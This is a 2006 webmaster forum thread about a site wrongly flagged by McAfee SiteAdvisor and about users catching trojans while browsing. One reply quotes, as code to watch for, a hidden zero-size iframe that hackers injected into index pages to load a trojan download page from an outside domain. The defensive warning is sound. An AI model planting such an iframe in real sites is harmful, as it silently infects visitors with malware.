Seo'ers - UK SEO, Internet Marketing and Webmaster Forums
May 23, 2013, 10:47:10 AM *
Welcome, Guest. Please login or register.

Login with username, password and session length
 
   Home   Help Search Login Register  
Del.icio.us Digg FURL FaceBook Stumble Upon Reddit SlashDot

Pages: [1]
  Print  
Author Topic: SiteAdvisor & Matt Cutss  (Read 936 times)
0 Members and 1 Guest are viewing this topic.
Webnauts
Global Moderator
Major
*****

Karma: +6/-3
Offline Offline

Posts: 605


Web Architect & Senior SEO Consultant


View Profile WWW
« on: October 13, 2006, 05:29:16 AM »

Someone contacted us today, telling us that we are flagged with red with the McAffee Site Advisor.

Their result there was:

"When we tested this site we found links to webaim.org, which we found to be a distributor of downloads some people consider adware, spyware or other unwanted programs."

Unfortunately we deleted site wide all links of them, even if they were highly valuable OBLs.

Later we looked further into this issue, and we came up with this post of Matt Cutts: http://www.mattcutts.com/blog/siteadvisor-study/

What do you think about all this?

I would also be very thankful if you would add your comments about our site there.

I think, they just SUCK!

Thanks
Logged

I think I've caught GoogleBot crawling my local hard drive!
SEO Workers Organic Search Engine Optimization Experts - SEO Analysis Tool
SEO Articles & Tutorials - Internet Marketing & Web Technologies Forums

Follow me on Twitter: @seoworkers and @webnauts
Seo'ers - UK SEO, Internet Marketing and Webmaster Forums
« on: October 13, 2006, 05:29:16 AM »

Recommended SEOers Resources

3 months free Web Hosting from 123-reg!
 Logged
Tubby
Major
*****

Karma: +5/-0
Offline Offline

Posts: 582



View Profile WWW
« Reply #1 on: October 13, 2006, 05:52:39 AM »

Just stay  Vigilant.
This is about all you can do. . .
Logged

Webnauts
Global Moderator
Major
*****

Karma: +6/-3
Offline Offline

Posts: 605


Web Architect & Senior SEO Consultant


View Profile WWW
« Reply #2 on: October 13, 2006, 05:57:42 AM »

They possibly could been potential clients, who left us the following message over our site (User details hidden):

You have been contacted by: Roy (xxx:xxx)
from Ip Address: xxx.xxx.xxx.xx
with Email Address: rcpierce@xxx.net
Homepage: http://xxx.xxx.net
Locale: en


Comments:

 Thought you should know:

http://www.siteadvisor.com/sites/webnauts.net?ref=safe&aff_id=0
Logged

I think I've caught GoogleBot crawling my local hard drive!
SEO Workers Organic Search Engine Optimization Experts - SEO Analysis Tool
SEO Articles & Tutorials - Internet Marketing & Web Technologies Forums

Follow me on Twitter: @seoworkers and @webnauts
crankydave
Major
*****

Karma: +3/-0
Offline Offline

Posts: 721



View Profile WWW
« Reply #3 on: October 13, 2006, 01:21:57 PM »

Interesting

I think what defines a potentially "bad neighborhood" just got expanded.

I didn't look specifically into what was it about the site that was at issue.

Were the downloads adware?

Dave
Logged

yourweb
Global Moderator
General
*****

Karma: +10/-0
Offline Offline

Posts: 10792



View Profile WWW
« Reply #4 on: October 13, 2006, 01:46:39 PM »

Intersting link here

McAffee Site Advisor.

You can run all your sites through this and find out more info you would of never known. Thanks for that link/site check.
Logged

YourWeb.Info Shopping Mall is the friendliest on the net!
Tubby
Major
*****

Karma: +5/-0
Offline Offline

Posts: 582



View Profile WWW
« Reply #5 on: October 14, 2006, 01:39:24 AM »

I collected two more trojan's in the last 24 hours (among other lesser items)

It is getting hard to go a day without collecting a few. I have no Idea where they are coming from, they just arrive!
Logged

yourweb
Global Moderator
General
*****

Karma: +10/-0
Offline Offline

Posts: 10792



View Profile WWW
« Reply #6 on: October 14, 2006, 03:00:24 AM »

Quote from: "Tubby"
I collected two more trojan's in the last 24 hours (among other lesser items)

It is getting hard to go a day without collecting a few. I have no Idea where they are coming from, they just arrive!

What software do you have for this? It might be that the software you have now has not gotten rid of first trojan and it keeps coming back.

What sites have you gone to the last time you got rid of those trogans?
Logged

YourWeb.Info Shopping Mall is the friendliest on the net!
Tubby
Major
*****

Karma: +5/-0
Offline Offline

Posts: 582



View Profile WWW
« Reply #7 on: October 22, 2006, 07:09:30 AM »

Just the usual round of wpw and tip, and wherever my clicking finger tempts me.

I seem to collect different ones. No trogans for a few days now. just little niggly little 'plants' from websites.
Logged

yourweb
Global Moderator
General
*****

Karma: +10/-0
Offline Offline

Posts: 10792



View Profile WWW
« Reply #8 on: October 23, 2006, 01:13:30 AM »

Quote from: "Tubby"
Just the usual round of wpw and tip, and wherever my clicking finger tempts me.

I seem to collect different ones. No trogans for a few days now. just little niggly little 'plants' from websites.

I just got one of those today. It was from a site I was putting my site into a directory. Submitting it. Some people add a little something to there sites for those of use that go there. Seems harmless at first. Might do a whole system sweep and see if anything comes up. I run about 5 virus type of programs on my system. Not at the same time. When something happens to me I run the whole mill of programs I have and see what comes up. Not all will caught those virus.
Logged

YourWeb.Info Shopping Mall is the friendliest on the net!
Seo'ers - UK SEO, Internet Marketing and Webmaster Forums
« Reply #8 on: October 23, 2006, 01:13:30 AM »

Recommended SEOers Resources

3 months free Web Hosting from 123-reg!
 Logged
faglork
Captain
*****

Karma: +0/-0
Offline Offline

Posts: 289



View Profile WWW
« Reply #9 on: October 23, 2006, 10:49:31 AM »

Could be hacked servers. I know of a widespread case where the hacker adds an invisible iFrame to all index.html, in which he loads a download page with a trojan.

Look for code like

Code:
<iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=manph' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>

or similar. Note that this code, inserted in a page, will not be visible to the visitor. Works in framesets, too.

Several CMS/Blog software were affected, and cPanel too:
http://news.netcraft.com/archives/2006/09/23/hostgator_cpanel_security_hole_exploited_in_mass_hack.html



Cheers,
faglork
Logged

faglork
Captain
*****

Karma: +0/-0
Offline Offline

Posts: 289



View Profile WWW
« Reply #10 on: October 23, 2006, 11:19:51 AM »

Regarding the OP, did you read the owner' response at
http://www.siteadvisor.com/sites/webaim.org
??

This is not funny ...

Cheers,
faglork
Logged

yourweb
Global Moderator
General
*****

Karma: +10/-0
Offline Offline

Posts: 10792



View Profile WWW
« Reply #11 on: October 23, 2006, 01:05:55 PM »

Someone was mad at them.
Logged

YourWeb.Info Shopping Mall is the friendliest on the net!
Webnauts
Global Moderator
Major
*****

Karma: +6/-3
Offline Offline

Posts: 605


Web Architect & Senior SEO Consultant


View Profile WWW
« Reply #12 on: November 03, 2006, 02:10:08 PM »

I forgot to mention that we have contacted McAffee a while ago, and since yesterday the issue is fixed! Smiley

I thought you would like to know that here. Smiley
Logged

I think I've caught GoogleBot crawling my local hard drive!
SEO Workers Organic Search Engine Optimization Experts - SEO Analysis Tool
SEO Articles & Tutorials - Internet Marketing & Web Technologies Forums

Follow me on Twitter: @seoworkers and @webnauts
Pages: [1]
  Print  
 
Jump to:  


Related Topics
Subject Started by Replies Views Last post
matt damon
THE 'RANT' ROOM
hawkwind dave 22 2139 Last post July 06, 2006, 11:10:25 AM
by hawkwind dave
Matt Cutts update on BigDaddy
Google
ctabuk 22 1908 Last post June 22, 2006, 06:29:59 PM
by Pascal
Matt Cutts Forum
Google
ctabuk 2 817 Last post July 29, 2006, 12:10:26 PM
by crankydave
Why Matt Cutts gives info on his blog
Google
Pascal 5 839 Last post November 07, 2006, 04:28:41 PM
by Pascal
Why did Matt Cutts removed my post?
Google
Pascal 0 272 Last post August 06, 2007, 11:01:15 AM
by Pascal
Powered by MySQL Powered by PHP Powered by SMF 1.1.8 | SMF © 2006-2008, Simple Machines LLC | Sitemap Valid XHTML 1.0! Valid CSS!


Google visited last this page May 20, 2013, 04:00:28 PM